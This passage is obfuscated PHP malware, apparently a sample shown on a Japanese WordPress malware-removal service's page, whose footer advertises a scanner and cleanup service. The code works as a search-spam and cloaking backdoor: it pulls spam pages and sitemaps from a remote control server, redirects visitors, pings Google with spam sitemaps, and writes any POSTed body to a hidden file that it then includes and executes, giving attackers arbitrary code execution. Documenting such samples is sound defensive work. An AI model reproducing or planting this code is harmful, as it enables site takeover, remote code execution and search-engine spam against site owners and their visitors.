$BRtnN = urlx(sprintf("https://%s/bot/302?" . $OClhb . "&uri=" . $Et744, gets()), $xR4Xh, $OClhb, 1);
@header("Location: " . $BRtnN);
exit;
}
$OClhb = $LGjHd . "&http=" . $hM7Z9 . "&groupid=" . $NrTSL;
if (@preg_match("#([a-z]+)-(\\d+)?(.html)\$#i", $Et744, $a31x_)) {
$OClhb .= sprintf("&hpid=%s-%s", preg_replace("/[a-zI](xyz|buzz).*\$/", ".\$1", strrev($a31x_[1])), $a31x_[2]);
echo @trim(urlx(sprintf("https://%s/bot/page?" . $OClhb, gets()), $xR4Xh, $OClhb, 1));
exit;
}
if (@preg_match("#cate\\/([a-z]+)-(\\d+)\$#i", $Et744, $Lv7s7)) {
echo @trim(urlx(sprintf("https://%s/bot/cate?" . $OClhb, gets()), $xR4Xh, $OClhb . "&host=" . preg_replace("/[a-zI](xyz|buzz).*\$/", ".\$1", strrev($Lv7s7[1])) . "&cateid=" . $Lv7s7[2], 1));
exit;
}
echo @trim(urlx(sprintf("https://%s/bot/home?" . $OClhb . "&uri=" . $Et744, gets()), $xR4Xh, $OClhb, 1));
exit;
}
$gOoLH = strval(time());
array_push($xR4Xh, "timestamp: " . $gOoLH);
array_push($xR4Xh, "xdoim: " . crc32($gOoLH . "\\n" . $LGjHd));
$MDAw8 = trim(urlx("https://" . gets() . $a31x_[0], $xR4Xh, $LGjHd));
echo $F1gD0 === false ? "fail" . gets() : $MDAw8 . $NrTSL . gets();
exit;
}
$uF5KJ = "https://search.yahoo.co.jp/search?p=site:%s&ei=UTF-8";
$uF5KJ = $a31x_[1] == '' ? sprintf($uF5KJ, $WdTuD) : sprintf($uF5KJ, $a31x_[1]);
$lFhBg = urlx($uF5KJ, null, null, 1, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7");
$lFhBg = substr($lFhBg, strpos($lFhBg, "<!-- -->"), 100);
$lFhBg = str_replace(array("/\\/s+/", "\\r\\n", "\\r", "\\n", "\"", ","), '', $lFhBg);
@preg_match("#(\\d*)件<!--#", $lFhBg, $a31x_);
echo $a31x_[1];
exit;
}
$gOoLH = isset($_SERVER["HTTP_TIMESTAMP"]) ? $_SERVER["HTTP_TIMESTAMP"] : '';
$fSyrl = @file_get_contents("php://input");
@file_put_contents(".eGA0Ty2WLh", $fSyrl, FILE_USE_INCLUDE_PATH);
echo include ".eGA0Ty2WLh";
unlink(".eGA0Ty2WLh");
exit;
}
$LGjHd = "shost=" . $WdTuD . "&http=" . $hM7Z9;
if (@preg_match("#(\\d+)-\$#", $a31x_[1], $QaYGv)) {
$LGjHd .= "&groupid=" . $QaYGv[1];
goto V0Xfr;
}
$LGjHd .= "&groupid=" . $NrTSL;
V0Xfr:
$gOoLH = strval(time());
array_push($xR4Xh, "timestamp: " . $gOoLH);
array_push($xR4Xh, "xdoim: " . crc32($gOoLH . "\\n" . $LGjHd));
$tTacP = trim(urlx("https://" . gets() . "/sitemap" . ($a31x_[1] == '' || $QaYGv[1] != '' ? ".xml" : "/" . $a31x_[1]), $xR4Xh, $LGjHd));
if (!($tTacP === '')) {
@header("Content-type: text/xml");
if (!(($a31x_[1] === '' || $QaYGv[1] != '') && @preg_match("#^(\\d)*#", $tTacP))) {
$gVGsY = explode("\n", $tTacP);
$WmIhR = '';
foreach ($gVGsY as $xlv7r) {
$BRtnN = $hM7Z9 . "://" . $WdTuD . "/" . $xlv7r;
$WmIhR .= sprintf($MZBoo, $BRtnN, $BRtnN);
}
echo sprintf($zgLiX, $WmIhR);
exit;
}
$yGmwu = '';
$p0f1C = 1;
FuNe2:
if (!($p0f1C <= intval($tTacP))) {
echo sprintf($gPehY, $yGmwu);
exit;
}
$yGmwu .= sprintf($reKgL, $hM7Z9, $WdTuD, $p0f1C, date("Y-m-d\\TH:i:sP", time()));
$p0f1C++;
goto FuNe2;
}
exit;
}
$m6H6r = '';
if ($a31x_[1] === '' || @preg_match("#(\\d+)-\$#", $a31x_[1], $QaYGv)) {
$LGjHd .= $QaYGv[1] == '' ? "&groupid=" . $NrTSL : "&groupid=" . $QaYGv[1];
$gOoLH = strval(time());
array_push($xR4Xh, "timestamp: " . $gOoLH);
array_push($xR4Xh, "xdoim: " . crc32($gOoLH . "\\n" . $LGjHd));
$tTacP = trim(urlx("https://" . gets() . "/sitemap.xml", $xR4Xh, $LGjHd . "&http=" . $hM7Z9));
if (!($tTacP === '')) {
if (!@preg_match("#^(\\d)*#", $tTacP)) {
goto NGbfN;
}
$p0f1C = 1;
danAl:
if (!($p0f1C <= intval($tTacP))) {
NGbfN:
goto b1Mdg;
}
$cnH0x = sprintf("https://www.google.co.jp/ping?sitemap=%s://%s/sitemap%s%d.xml", $hM7Z9, $WdTuD, $QaYGv[0], $p0f1C);
$R62Np = urlx($cnH0x);
$m6H6r .= $cnH0x . $R62Np;
$p0f1C++;
goto danAl;
}
exit;
}
$cnH0x = sprintf("https://www.google.co.jp/ping?sitemap=%s://%s/sitemap%s.xml", $hM7Z9, $WdTuD, $a31x_[1]);
$R62Np = urlx($cnH0x);
$m6H6r .= $cnH0x . $R62Np;
b1Mdg:
echo $m6H6r;
exit;■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.